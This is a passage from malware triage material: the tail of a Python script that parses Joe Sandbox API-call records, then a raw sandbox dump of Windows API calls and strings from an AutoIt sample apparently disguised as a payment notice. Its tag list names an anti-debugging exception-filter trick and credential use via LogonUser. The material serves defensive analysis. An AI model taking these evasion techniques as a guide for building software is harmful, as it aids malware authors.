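#   • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,005B8309), ref: 005B81E0
#   • DestroyWindow.USER32 ref: 005D787B
# The argument list is optional; "ref" is the 8-hex-digit address of the call site.
API_LINE = re.compile(
    r"^\s*•?\s*(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)

# Analyst heuristic for this example (not a Joe Sandbox signature): APIs in a compiled
# AutoIt sample that deserve a second look, with the reason a reviewer would note.
TAGS = {
    "SetUnhandledExceptionFilter": "exception-filter trick; the filter is not reached when a debugger is attached",
    "UnhandledExceptionFilter": "exception-filter trick",
    "AdjustTokenPrivileges": "token privilege change",
    "LogonUserW": "credential use via LogonUser",
    "mouse_event": "synthetic mouse input",
    "CreateStreamOnHGlobal": "in-memory stream built from file contents",
}

# Constructed sample input: API bullets copied from two records in this report.
SAMPLE_TOKEN_RECORD = [
    "• AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,005B8309), ref: 005B81E0",
    "• CloseHandle.KERNEL32(?,?,005B8309), ref: 005B81F2",
]
SAMPLE_WINDOW_RECORD = [
    "• DestroyWindow.USER32 ref: 005D787B",
    "• CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 005D7A35",
    "• CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 005D7B00",
]


def parse_api_line(line):
    """Parse one API bullet into {api, module, args, ref}; return None for non-API lines."""
    m = API_LINE.match(line)
    if not m:
        return None
    raw = m.group("args")
    args = [] if not raw else [a.strip() for a in raw.split(",")]
    return {
        "api": m.group("api"),
        "module": m.group("module").upper(),
        "args": args,
        "ref": int(m.group("ref"), 16),
    }


def parse_record(lines):
    """Keep only the lines of a record that are API bullets, in report order."""
    return [c for c in (parse_api_line(l) for l in lines) if c is not None]


def triage(calls):
    """Summarise a parsed record for a first-pass review."""
    refs = [c["ref"] for c in calls]
    return {
        "calls": len(calls),
        "ref_lo": min(refs) if refs else None,
        "ref_hi": max(refs) if refs else None,
        "unresolved_args": sum(c["args"].count("?") for c in calls),
        "modules": sorted({c["module"] for c in calls}),
        "tags": {c["api"]: TAGS[c["api"]] for c in calls if c["api"] in TAGS},
    }


if __name__ == "__main__":
    for name, rec in (("token", SAMPLE_TOKEN_RECORD), ("window", SAMPLE_WINDOW_RECORD)):
        summary = triage(parse_record(rec))
        print(name, f"{summary['calls']} calls", f"{summary['ref_lo']:08X}-{summary['ref_hi']:08X}",
              f"{summary['unresolved_args']} unresolved args", summary["modules"])
        for api, why in summary["tags"].items():
            print("  flag:", api, "->", why)
```

The address range in the summary is a quick way to see whether a record's calls sit together in one function (the AdjustTokenPrivileges and CloseHandle call sites are 0x12 bytes apart) or are scattered, and the unresolved-argument count shows how much of the call context the sandbox actually recovered before trusting the argument values in a write-up.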
                                                            APIs
                                                            • DeleteObject.GDI32(00000000), ref: 005D785B
                                                            • DeleteObject.GDI32(00000000), ref: 005D786D
                                                            • DestroyWindow.USER32 ref: 005D787B
                                                            • GetDesktopWindow.USER32 ref: 005D7895
                                                            • GetWindowRect.USER32(00000000), ref: 005D789C
                                                            • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 005D79DD
                                                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 005D79ED
                                                            • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 005D7A35
                                                            • GetClientRect.USER32(00000000,?), ref: 005D7A41
                                                            • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 005D7A7B
                                                            • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 005D7A9D
                                                            • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 005D7AB0
                                                            • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 005D7ABB
                                                            • GlobalLock.KERNEL32(00000000), ref: 005D7AC4
                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 005D7AD3
                                                            • GlobalUnlock.KERNEL32(00000000), ref: 005D7ADC
                                                            • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 005D7AE3
                                                            • GlobalFree.KERNEL32(00000000), ref: 005D7AEE
                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 005D7B00
                                                            • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,005F2CAC,00000000), ref: 005D7B16
                                                            • GlobalFree.KERNEL32(00000000), ref: 005D7B26
                                                            • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 005D7B4C
                                                            • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 005D7B6B
                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 005D7B8D
                                                            • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 005D7D7A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                            • String ID: $AutoIt v3$DISPLAY$static
                                                            • API String ID: 2211948467-2373415609
                                                            • Opcode ID: 3a6a17562aab9c16761d852d1984127410ad9649bf1cd3237c7ea0ca6551bddf
                                                            • Instruction ID: 77b4f67032dea1c34ccdf0e0fc07ef2aedb679f046afc1c8328f751ca7ab838e
                                                            • Opcode Fuzzy Hash: 3a6a17562aab9c16761d852d1984127410ad9649bf1cd3237c7ea0ca6551bddf
                                                            • Instruction Fuzzy Hash: F3025C71900119EFDB24DFA8DC89EAE7BB9FB48310F10815AF945AB2A1DB309D01DB60
                                                            APIs
                                                            • CharUpperBuffW.USER32(?,?,005EF910), ref: 005E3627
                                                            • IsWindowVisible.USER32(?), ref: 005E364B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: BuffCharUpperVisibleWindow
                                                            • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                            • API String ID: 4105515805-45149045
                                                            • Opcode ID: c41785880b21e53e8cf1b346665d2c8f0f709f5b9ed44e6c0bd5cf6ec519cde4
                                                            • Instruction ID: 8e5ec3efc75d7626a5e2969f3611368dc6a2f667ee1c84d98ad6a924af68598e
                                                            • Opcode Fuzzy Hash: c41785880b21e53e8cf1b346665d2c8f0f709f5b9ed44e6c0bd5cf6ec519cde4
                                                            • Instruction Fuzzy Hash: D8D184742043429BCB08EF11C45AAAE7FA6BF94344F154868F8C15B3E2DB31EE4ACB51
                                                            APIs
                                                            • SetTextColor.GDI32(?,00000000), ref: 005EA630
                                                            • GetSysColorBrush.USER32(0000000F), ref: 005EA661
                                                            • GetSysColor.USER32(0000000F), ref: 005EA66D
                                                            • SetBkColor.GDI32(?,000000FF), ref: 005EA687
                                                            • SelectObject.GDI32(?,00000000), ref: 005EA696
                                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 005EA6C1
                                                            • GetSysColor.USER32(00000010), ref: 005EA6C9
                                                            • CreateSolidBrush.GDI32(00000000), ref: 005EA6D0
                                                            • FrameRect.USER32(?,?,00000000), ref: 005EA6DF
                                                            • DeleteObject.GDI32(00000000), ref: 005EA6E6
                                                            • InflateRect.USER32(?,000000FE,000000FE), ref: 005EA731
                                                            • FillRect.USER32(?,?,00000000), ref: 005EA763
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 005EA78E
                                                              • Part of subcall function 005EA8CA: GetSysColor.USER32(00000012), ref: 005EA903
                                                              • Part of subcall function 005EA8CA: SetTextColor.GDI32(?,?), ref: 005EA907
                                                              • Part of subcall function 005EA8CA: GetSysColorBrush.USER32(0000000F), ref: 005EA91D
                                                              • Part of subcall function 005EA8CA: GetSysColor.USER32(0000000F), ref: 005EA928
                                                              • Part of subcall function 005EA8CA: GetSysColor.USER32(00000011), ref: 005EA945
                                                              • Part of subcall function 005EA8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 005EA953
                                                              • Part of subcall function 005EA8CA: SelectObject.GDI32(?,00000000), ref: 005EA964
                                                              • Part of subcall function 005EA8CA: SetBkColor.GDI32(?,00000000), ref: 005EA96D
                                                              • Part of subcall function 005EA8CA: SelectObject.GDI32(?,?), ref: 005EA97A
                                                              • Part of subcall function 005EA8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 005EA999
                                                              • Part of subcall function 005EA8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 005EA9B0
                                                              • Part of subcall function 005EA8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 005EA9C5
                                                              • Part of subcall function 005EA8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 005EA9ED
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                            • String ID:
                                                            • API String ID: 3521893082-0
                                                            • Opcode ID: 9c96f9229b3336cbb6cfd88613d31c0d9a6e7418078757be173875e5d477a4d2
                                                            • Instruction ID: 94e35076991e19e579bb56df19dedb09ef9b01eb705d305f207d7df934f527c3
                                                            • Opcode Fuzzy Hash: 9c96f9229b3336cbb6cfd88613d31c0d9a6e7418078757be173875e5d477a4d2
                                                            • Instruction Fuzzy Hash: 1B919072408341EFD7189F64DC48A5B7BB9FF98321F101A29F5E29A1A0DB30E948DB52
                                                            APIs
                                                            • DestroyWindow.USER32(00000000), ref: 005D74DE
                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 005D759D
                                                            • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 005D75DB
                                                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 005D75ED
                                                            • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 005D7633
                                                            • GetClientRect.USER32(00000000,?), ref: 005D763F
                                                            • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 005D7683
                                                            • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 005D7692
                                                            • GetStockObject.GDI32(00000011), ref: 005D76A2
                                                            • SelectObject.GDI32(00000000,00000000), ref: 005D76A6
                                                            • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 005D76B6
                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 005D76BF
                                                            • DeleteDC.GDI32(00000000), ref: 005D76C8
                                                            • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 005D76F4
                                                            • SendMessageW.USER32(00000030,00000000,00000001), ref: 005D770B
                                                            • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 005D7746
                                                            • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 005D775A
                                                            • SendMessageW.USER32(00000404,00000001,00000000), ref: 005D776B
                                                            • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 005D779B
                                                            • GetStockObject.GDI32(00000011), ref: 005D77A6
                                                            • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 005D77B1
                                                            • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 005D77BB
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                            • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                            • API String ID: 2910397461-517079104
                                                            • Opcode ID: 9ed0f843fe5c840fd0210b1c0f18d82b6130842f67ff994a4f0b9605907c3899
                                                            • Instruction ID: 63302e1b117e0c2eb496f6ed57d10cc7543028dc6f53229cfbcae3ee88cfba9d
                                                            • Opcode Fuzzy Hash: 9ed0f843fe5c840fd0210b1c0f18d82b6130842f67ff994a4f0b9605907c3899
                                                            • Instruction Fuzzy Hash: F3A16471A41619BFEB24DBA4DC49FAE7B79FB48710F108115FA15AB2E0DB70AD01CB60
                                                            APIs
                                                            • SetErrorMode.KERNEL32(00000001), ref: 005CAD1E
                                                            • GetDriveTypeW.KERNEL32(?,005EFAC0,?,\\.\,005EF910), ref: 005CADFB
                                                            • SetErrorMode.KERNEL32(00000000,005EFAC0,?,\\.\,005EF910), ref: 005CAF59
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode$DriveType
                                                            • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                            • API String ID: 2907320926-4222207086
                                                            • Opcode ID: 56fbc2ba5c8b7018374d253233da32693fadadd8287dd837d4b5bbfef593bdfb
                                                            • Instruction ID: 5d8ec03d63348ba6313b1c295ab9cc9df93c43122f84357c89090c93b5b250f1
                                                            • Opcode Fuzzy Hash: 56fbc2ba5c8b7018374d253233da32693fadadd8287dd837d4b5bbfef593bdfb
                                                            • Instruction Fuzzy Hash: 6B51D6B464820EDF8B00DBA0C986EFD7FA6FF48308724495EE407A7291EE319D41DB52
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: __wcsnicmp
                                                            • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                            • API String ID: 1038674560-86951937
                                                            • Opcode ID: 9093688de1f1b637695905950e8c4ddcf37de0c5f9c87b6174df271d2a961ffd
                                                            • Instruction ID: 46f9df8e6d4ea578692a9aeff8040de5973b84b160d921b4ecaaffa73e92f2b2
                                                            • Opcode Fuzzy Hash: 9093688de1f1b637695905950e8c4ddcf37de0c5f9c87b6174df271d2a961ffd
                                                            • Instruction Fuzzy Hash: 3181E3B0640206AADF20BA60DC47FAA7FA9FF55700F044424FD45AB196EB60EA45C7A1
                                                            APIs
                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 005E9AD2
                                                            • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 005E9B8B
                                                            • SendMessageW.USER32(?,00001102,00000002,?), ref: 005E9BA7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Window
                                                            • String ID: 0
                                                            • API String ID: 2326795674-4108050209
                                                            • Opcode ID: 820bf34e7136ed9ee94e546420a2a72b4159c4cdfe72ae43eccb3d0cde9831ad
                                                            • Instruction ID: 1d4127f5fe2ae6fbdcc25f88119f160d67bf195cc2f04426baa8d66ef7d8d4e7
                                                            • Opcode Fuzzy Hash: 820bf34e7136ed9ee94e546420a2a72b4159c4cdfe72ae43eccb3d0cde9831ad
                                                            • Instruction Fuzzy Hash: B902DF70104381AFD729CF26C889BAABFE5FF95300F04892DF9D99A2A1C774D944DB52
                                                            APIs
                                                            • GetSysColor.USER32(00000012), ref: 005EA903
                                                            • SetTextColor.GDI32(?,?), ref: 005EA907
                                                            • GetSysColorBrush.USER32(0000000F), ref: 005EA91D
                                                            • GetSysColor.USER32(0000000F), ref: 005EA928
                                                            • CreateSolidBrush.GDI32(?), ref: 005EA92D
                                                            • GetSysColor.USER32(00000011), ref: 005EA945
                                                            • CreatePen.GDI32(00000000,00000001,00743C00), ref: 005EA953
                                                            • SelectObject.GDI32(?,00000000), ref: 005EA964
                                                            • SetBkColor.GDI32(?,00000000), ref: 005EA96D
                                                            • SelectObject.GDI32(?,?), ref: 005EA97A
                                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 005EA999
                                                            • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 005EA9B0
                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 005EA9C5
                                                            • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 005EA9ED
                                                            • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 005EAA14
                                                            • InflateRect.USER32(?,000000FD,000000FD), ref: 005EAA32
                                                            • DrawFocusRect.USER32(?,?), ref: 005EAA3D
                                                            • GetSysColor.USER32(00000011), ref: 005EAA4B
                                                            • SetTextColor.GDI32(?,00000000), ref: 005EAA53
                                                            • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 005EAA67
                                                            • SelectObject.GDI32(?,005EA5FA), ref: 005EAA7E
                                                            • DeleteObject.GDI32(?), ref: 005EAA89
                                                            • SelectObject.GDI32(?,?), ref: 005EAA8F
                                                            • DeleteObject.GDI32(?), ref: 005EAA94
                                                            • SetTextColor.GDI32(?,?), ref: 005EAA9A
                                                            • SetBkColor.GDI32(?,?), ref: 005EAAA4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                            • String ID:
                                                            • API String ID: 1996641542-0
                                                            • Opcode ID: 0fabd7fb400c0debc8c362be3abd264ce52153a2d3612c01c81137482dda465b
                                                            • Instruction ID: 5c1d179c4f8f1ff208ba452420355b20f3519eebc1e0557ddcc3cc667df36682
                                                            • Opcode Fuzzy Hash: 0fabd7fb400c0debc8c362be3abd264ce52153a2d3612c01c81137482dda465b
                                                            • Instruction Fuzzy Hash: 3B516C71800248EFDB149FA4DC88EAE7FB9FB48320F114625F951AB2A1DB719944DF90
                                                            APIs
                                                            • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 005E8AC1
                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 005E8AD2
                                                            • CharNextW.USER32(0000014E), ref: 005E8B01
                                                            • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 005E8B42
                                                            • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 005E8B58
                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 005E8B69
                                                            • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 005E8B86
                                                            • SetWindowTextW.USER32(?,0000014E), ref: 005E8BD8
                                                            • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 005E8BEE
                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 005E8C1F
                                                            • _memset.LIBCMT ref: 005E8C44
                                                            • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 005E8C8D
                                                            • _memset.LIBCMT ref: 005E8CEC
                                                            • SendMessageW.USER32(?,00001053,000000FF,?), ref: 005E8D16
                                                            • SendMessageW.USER32(?,00001074,?,00000001), ref: 005E8D6E
                                                            • SendMessageW.USER32(?,0000133D,?,?), ref: 005E8E1B
                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 005E8E3D
                                                            • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 005E8E87
                                                            • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 005E8EB4
                                                            • DrawMenuBar.USER32(?), ref: 005E8EC3
                                                            • SetWindowTextW.USER32(?,0000014E), ref: 005E8EEB
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                            • String ID: 0
                                                            • API String ID: 1073566785-4108050209
                                                            • Opcode ID: 7853ad833910448bcdc114d3f9658845ad32b7af0f075d7bbb3c2cf66aac1dc0
                                                            • Instruction ID: d7ee6bb72bf8cb193ac0ab14c64eb59e14255799282fb8681f43c758b83db718
                                                            • Opcode Fuzzy Hash: 7853ad833910448bcdc114d3f9658845ad32b7af0f075d7bbb3c2cf66aac1dc0
                                                            • Instruction Fuzzy Hash: A8E16170900299AFDB249F51CC84EFE7F79FF45710F108156F999AA190DB709A84DF50
                                                            APIs
                                                            • GetCursorPos.USER32(?), ref: 005E49CA
                                                            • GetDesktopWindow.USER32 ref: 005E49DF
                                                            • GetWindowRect.USER32(00000000), ref: 005E49E6
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 005E4A48
                                                            • DestroyWindow.USER32(?), ref: 005E4A74
                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 005E4A9D
                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 005E4ABB
                                                            • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 005E4AE1
                                                            • SendMessageW.USER32(?,00000421,?,?), ref: 005E4AF6
                                                            • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 005E4B09
                                                            • IsWindowVisible.USER32(?), ref: 005E4B29
                                                            • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 005E4B44
                                                            • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 005E4B58
                                                            • GetWindowRect.USER32(?,?), ref: 005E4B70
                                                            • MonitorFromPoint.USER32(?,?,00000002), ref: 005E4B96
                                                            • GetMonitorInfoW.USER32(00000000,?), ref: 005E4BB0
                                                            • CopyRect.USER32(?,?), ref: 005E4BC7
                                                            • SendMessageW.USER32(?,00000412,00000000), ref: 005E4C32
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
